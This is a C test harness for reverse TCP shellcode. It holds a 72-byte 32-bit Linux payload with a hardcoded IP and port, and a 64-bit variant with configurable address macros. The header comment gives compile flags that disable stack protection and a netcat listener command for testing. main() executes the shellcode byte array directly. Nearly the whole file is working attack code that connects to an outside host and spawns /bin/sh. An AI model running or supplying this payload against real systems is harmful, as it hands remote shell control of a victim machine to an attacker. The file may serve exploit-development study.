shell_test.c

/*

 shell_reverse_tcp_shellcode

 * 72 bytes
 * null-bytes free if the port and address are
 * the ip address and port number are easily changeable (2nd to 5th bytes are the IP) and (9th and 10th are the Port)

 # gcc -m32 -fno-stack-protector -z execstack shellcode.c -o shellcode
 # ./shellcode

 Testing
 # nc -l 4444
 # ./shellcode

*/

#include <stdio.h>
#include <string.h>

const unsigned char shellcode[] = "\x6a\x66\x58\x6a\x01\x5b\x31\xd2\x52\x53\x6a\x02\x89\xe1\xcd\x80\x92\xb0\x66\x68\x4E\x33\x94\x76\x66\x68\xd6\xd9\x43\x66\x53\x89\xe1\x6a\x10\x51\x52\x89\xe1\x43\xcd\x80\x6a\x02\x59\x87\xda\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x41\x89\xca\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80";

#define IPADDR "\x4d\xba\x1f\x59"
#define PORT "\xd6\xd9"

const unsigned char code[] = \
    "\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x4d\x31\xc0\x6a"
    "\x02\x5f\x6a\x01\x5e\x6a\x06\x5a\x6a\x29\x58\x0f\x05\x49\x89\xc0"
    "\x48\x31\xf6\x4d\x31\xd2\x41\x52\xc6\x04\x24\x02\x66\xc7\x44\x24"
    "\x02"PORT"\xc7\x44\x24\x04"IPADDR"\x48\x89\xe6\x6a\x10"
    "\x5a\x41\x50\x5f\x6a\x2a\x58\x0f\x05\x48\x31\xf6\x6a\x03\x5e\x48"
    "\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x48\x31\xff\x57\x57\x5e\x5a"
    "\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54"
    "\x5f\x6a\x3b\x58\x0f\x05";

int main ()
{

    // When the IP contains null-bytes, printf will show a wrong shellcode length.

    printf("Shellcode Length:  %d\n", strlen(shellcode));

    // Pollutes all registers ensuring that the shellcode runs in any circumstance.

//  __asm__ ("movl $0xffffffff, %eax\n\t"
//       "movl %eax, %ebx\n\t"
//       "movl %eax, %ecx\n\t"
//       "movl %eax, %edx\n\t"
//       "movl %eax, %esi\n\t"
//       "movl %eax, %edi\n\t"
//       "movl %eax, %ebp");

    //((int(*)())code)();
    ((int(*)())shellcode)();

    return 0;
}